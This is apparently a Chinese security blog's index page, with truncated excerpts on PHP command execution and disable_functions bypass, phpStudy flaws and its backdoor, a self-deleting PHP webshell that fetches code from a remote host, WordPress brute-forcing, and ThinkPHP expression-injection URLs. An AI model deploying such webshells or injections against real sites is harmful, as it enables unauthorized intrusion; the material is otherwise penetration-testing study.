PHP中执行系统命令(绕过disable_functions)

PHP中执行系统命令 在PHP中,执行系统命令,有以下方式或方法: exec() shell_exec() `whoami` system() passthru() popen() proc_open() pcntl_exec() :需要开启pcntl扩展 COM组件:Wscript.Shell和Shell.Application dl():通过加载自定义php扩展突破 disable_fucni...

- 阅读全文 -

phpstudy nginx解析漏洞

用的是phpstudy部署的,昨天看到那篇文章了,就用我的服务器测试了一下。     新建一个内容为<?php phpinfo();?>的 记事本,重命名保存为1.jpg     直接访问内网地址     然后加入/.php       成功执行phpinfo();   漏洞分析 这是我...

- 阅读全文 -

phpStudy后门分析

问题概要 有问题的版本如下 phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll 注:这两个官网下载的版本里,都没有发现php5.3版本下存在有问题的php_xmlrpc.dll,打开时会提示存在p...

- 阅读全文 -

PHP 无文件后门

  webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file...

- 阅读全文 -

最新WordPress账号密码暴力破解脚本

  在做渗透测试的时候,有时候会遇到一个wordpress博客, 如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。 大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢, 下次发包还是调用命令结合hydra来爆破。 原理是通过URL /?author= 遍历获取用户名, 然后先跑用户名与密码相同的用户, 再调用同目录下pass.txt中的密码文件进行爆破。...

- 阅读全文 -

PHP 5.4 内置web服务器

PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的P...

- 阅读全文 -

thinkphp 3.0 爆路径漏洞

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。 检测有两种情况 1. 可执行命令,这个估计是伪3.0版本? 交大定票 此站到可以执行命令 http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 可查看版本 http://webshell.cc/index.php/module...

- 阅读全文 -